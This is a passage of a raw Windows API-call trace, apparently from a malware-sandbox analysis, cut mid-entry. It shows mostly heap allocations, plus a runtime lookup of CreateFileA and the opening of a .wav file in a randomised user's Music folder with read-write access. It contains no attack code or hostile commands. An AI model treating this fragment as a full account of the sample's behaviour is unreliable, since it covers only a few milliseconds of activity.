0x9bd888 [0182.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0182.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0182.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0182.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0182.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0182.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0182.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0182.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0182.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0182.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0182.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0182.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0182.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0182.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0182.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0182.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0182.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0182.448] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0182.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0182.448] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0182.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0182.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0182.449] LoadLibraryW (lpLibFileName="kernel32.dll") returned 0x75990000 [0182.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0182.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0182.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 11 [0182.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xb) returned 0x9bd3d8 [0182.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFile", cchWideChar=11, lpMultiByteStr=0x9bd3d8, cbMultiByte=11, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFile", lpUsedDefaultChar=0x0) returned 11 [0182.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0182.449] GetProcAddress (hModule=0x75990000, lpProcName="CreateFile") returned 0x0 [0182.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0182.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0182.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0182.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0182.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0182.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0182.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 12 [0182.449] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc) returned 0x9bd3d8 [0182.449] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CreateFileA", cchWideChar=12, lpMultiByteStr=0x9bd3d8, cbMultiByte=12, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CreateFileA", lpUsedDefaultChar=0x0) returned 12 [0182.449] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0182.450] GetProcAddress (hModule=0x75990000, lpProcName="CreateFileA") returned 0x759a53c6 [0182.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd888 | out: hHeap=0x8a0000) returned 1 [0182.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0182.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0182.450] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0182.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0182.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1770 [0182.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a20 [0182.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e19f0 [0182.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b30 [0182.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0182.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0182.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0182.450] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10001) returned 0xbca008 [0182.451] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav", cchWideChar=100, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 100 [0182.451] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x64) returned 0x8e8320 [0182.451] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav", cchWideChar=100, lpMultiByteStr=0x8e8320, cbMultiByte=100, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav", lpUsedDefaultChar=0x0) returned 100 [0182.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e8320 | out: hHeap=0x8a0000) returned 1 [0182.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1770 | out: hHeap=0x8a0000) returned 1 [0182.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a20 | out: hHeap=0x8a0000) returned 1 [0182.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e19f0 | out: hHeap=0x8a0000) returned 1 [0182.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b30 | out: hHeap=0x8a0000) returned 1 [0182.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0182.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0182.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0182.451] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de8f8 | out: hHeap=0x8a0000) returned 1 [0182.451] CreateFileA (lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\etyjolzsqisxnk0ol\\fgmpl3n\\aj1lagiqtz\\-eybmjwmxhp\\tebq0vdnsx.wav"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0182.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0182.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x214) returned 0x8e8808 [0182.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de8f8 [0182.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd888 [0182.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0182.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0182.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0182.452] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda38 | out: hHeap=0x8a0000) returned 1 [0182.452] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b70 | out: hHeap=0x8a0000) returned 1 [0182.452] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3d8 | out: hHeap=0x8a0000) returned 1 [0182.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd3d8 [0182.452] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bda38 [0182.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0182.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1b70 [0182.453] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=100, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 100 [0182.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xc8) returned 0x8feba8 [0182.453] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x1, lpMultiByteStr=0xbca008, cbMultiByte=100, lpWideCharStr=0x8feba8, cchWideChar=100 | out: lpWideCharStr="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\ETYJoLZsQISXnK0OL\\fgMpL3n\\aJ1lagIQtz\\-eYbmJwmxhP\\teBq0VdNSx.wav") returned 100 [0182.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd480 | out: hHeap=0x8a0000) returned 1 [0182.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0xd0) returned 0x8c08b0 [0182.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8feba8 | out: hHeap=0x8a0000) returned 1 [0182.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0xbca008 | out: hHeap=0x8a0000) returned 1 [0182.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd480 [0182.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0182.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0182.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0182.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0182.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0182.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd918 | out: hHeap=0x8a0000) returned 1 [0182.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd918 [0182.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0182.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0182.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0182.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0182.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0182.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba138 | out: hHeap=0x8a0000) returned 1 [0182.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba138 [0182.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0182.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0182.453] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0182.453] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0182.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0182.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd348 | out: hHeap=0x8a0000) returned 1 [0182.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd348 [0182.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0182.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0182.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0182.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0182.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0182.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd408 | out: hHeap=0x8a0000) returned 1 [0182.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd408 [0182.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0182.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0182.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0182.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0182.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0182.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd5a0 | out: hHeap=0x8a0000) returned 1 [0182.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd5a0 [0182.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba120 [0182.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9a90 [0182.454] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1970 [0182.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a90 | out: hHeap=0x8a0000) returned 1 [0182.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1970 | out: hHeap=0x8a0000) returned 1 [0182.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba120 | out: hHeap=0x8a0000) returned 1 [0182.454] FreeLibrary (hLibModule=0x75990000) returned 1 [0182.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b20 | out: hHeap=0x8a0000) returned 1 [0182.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1b00 | out: hHeap=0x8a0000) returned 1 [0182.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18c0 | out: hHeap=0x8a0000) returned 1 [0182.454] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1900 | out: hHeap=0x8a0000) returned 1 [0182.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1af0 | out: hHeap=0x8a0000) returned 1 [0182.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0182.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0182.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8de1a0 | out: hHeap=0x8a0000) returned 1 [0182.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba000 | out: hHeap=0x8a0000) returned 1 [0182.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18f0 | out: hHeap=0x8a0000) returned 1 [0182.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bda50 | out: hHeap=0x8a0000) returned 1 [0182.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4b0 | out: hHeap=0x8a0000) returned 1 [0182.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8e8 | out: hHeap=0x8a0000) returned 1 [0182.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd4e0 | out: hHeap=0x8a0000) returned 1 [0182.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd588 | out: hHeap=0x8a0000) returned 1 [0182.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba540 | out: hHeap=0x8a0000) returned 1 [0182.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9b68 | out: hHeap=0x8a0000) returned 1 [0182.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9a60 | out: hHeap=0x8a0000) returned 1 [0182.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba078 | out: hHeap=0x8a0000) returned 1 [0182.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd6f0 | out: hHeap=0x8a0000) returned 1 [0182.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba378 | out: hHeap=0x8a0000) returned 1 [0182.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd3a8 | out: hHeap=0x8a0000) returned 1 [0182.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9f70 | out: hHeap=0x8a0000) returned 1 [0182.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd810 | out: hHeap=0x8a0000) returned 1 [0182.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd8d0 | out: hHeap=0x8a0000) returned 1 [0182.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd9f0 | out: hHeap=0x8a0000) returned 1 [0182.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd378 | out: hHeap=0x8a0000) returned 1 [0182.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba3f0 | out: hHeap=0x8a0000) returned 1 [0182.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd330 | out: hHeap=0x8a0000) returned 1 [0182.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9fb8 | out: hHeap=0x8a0000) returned 1 [0182.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd468 | out: hHeap=0x8a0000) returned 1 [0182.455] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0c0 | out: hHeap=0x8a0000) returned 1 [0182.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd960 | out: hHeap=0x8a0000) returned 1 [0182.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba0f0 | out: hHeap=0x8a0000) returned 1 [0182.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9b9e38 | out: hHeap=0x8a0000) returned 1 [0182.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba498 | out: hHeap=0x8a0000) returned 1 [0182.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9bd390 | out: hHeap=0x8a0000) returned 1 [0182.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9ba390 | out: hHeap=0x8a0000) returned 1 [0182.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x9c0b78 | out: hHeap=0x8a0000) returned 1 [0182.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1890 | out: hHeap=0x8a0000) returned 1 [0182.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de1a0 [0182.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba390 [0182.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1890 [0182.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd390 [0182.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18f0 [0182.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0182.456] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0182.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0182.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0182.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0182.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0182.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1980 [0182.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x18) returned 0x90d440 [0182.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1980 | out: hHeap=0x8a0000) returned 1 [0182.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x90d440 | out: hHeap=0x8a0000) returned 1 [0182.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0182.456] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0182.456] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x38) returned 0x90ad98 [0182.456] PeekMessageW (in: lpMsg=0x87f3fc, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x87f3fc) returned 0 [0182.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x20) returned 0x8de9e8 [0182.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba498 [0182.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0182.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9e38 [0182.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0182.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0f0 [0182.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0182.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd960 [0182.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0182.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba0c0 [0182.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0182.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd468 [0182.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0182.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9b9fb8 [0182.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0182.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd330 [0182.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0182.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9ba3f0 [0182.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e1a00 [0182.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x8) returned 0x8e18b0 [0182.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e18b0 | out: hHeap=0x8a0000) returned 1 [0182.457] HeapFree (in: hHeap=0x8a0000, dwFlags=0x0, lpMem=0x8e1a00 | out: hHeap=0x8a0000) returned 1 [0182.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1a00 [0182.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd378 [0182.457] CharLowerBuffW (in: lpsz="int", cchLength=0x3 | out: lpsz="int") returned 0x3 [0182.457] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x10) returned 0x9bd9f0 [0182.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e18b0 [0182.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, Size=0x4) returned 0x8e1980 [0182.458] RtlAllocateHeap (HeapHandle=0x8a0000, Flags=0x0, 